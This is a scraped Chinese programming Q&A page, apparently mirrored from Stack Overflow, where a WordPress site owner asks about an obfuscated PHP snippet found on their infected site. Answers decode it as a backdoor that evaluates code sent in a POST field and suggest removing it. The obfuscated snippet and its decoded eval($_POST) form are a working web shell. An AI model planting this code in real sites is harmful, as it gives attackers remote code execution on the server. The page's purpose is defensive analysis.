Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/php/262.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Php 这是什么代码?_Php_Wordpress_Malware - Fatal编程技术网
Fatal编程技术网
  • php/
  • Php 这是什么代码?

Php 这是什么代码?

php wordpress

Php 这是什么代码?,php,wordpress,malware,Php,Wordpress,Malware,我有一个wordpress网站,我想它感染了恶意软件。我在我的文件中找到了这段php代码 $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q140b2c'])){eval(${$s20}['q140b2c']);} 它能做什么?我面临着与我之前的一次网站黑客相同的问题。代码同上。他们将在php标记开始之前将代码放入.php文件中 因此,它将保持PHP站点的执行 要解决此问题,请下

我有一个wordpress网站,我想它感染了恶意软件。我在我的文件中找到了这段php代码

$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q140b2c'])){eval(${$s20}['q140b2c']);}
它能做什么?

我面临着与我之前的一次网站黑客相同的问题。代码同上。他们将在php标记开始之前将代码放入.php文件中

因此,它将保持PHP站点的执行

要解决此问题,请下载所有代码并在文件中搜索并删除。那么你的网站工作正常

$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);

$s20
计算结果为\u POST

if(isset(${$s20}['q140b2c'])){
    eval(${$s20}['q140b2c']);
}
变成

isset($_POST['q140b2c'])
eval然后评估该帖子中的内容

eval($_POST['q140b2c']);
这相当于:
if(isset($\u POST['q140b2c']){eval($\u POST['q140b2c']);}
。它让攻击者知道要设置哪个值,能够在服务器上运行他想要的任何东西。好吧,现在我如何清理网站以及我必须做什么?这不是你问的问题,我真的不知道。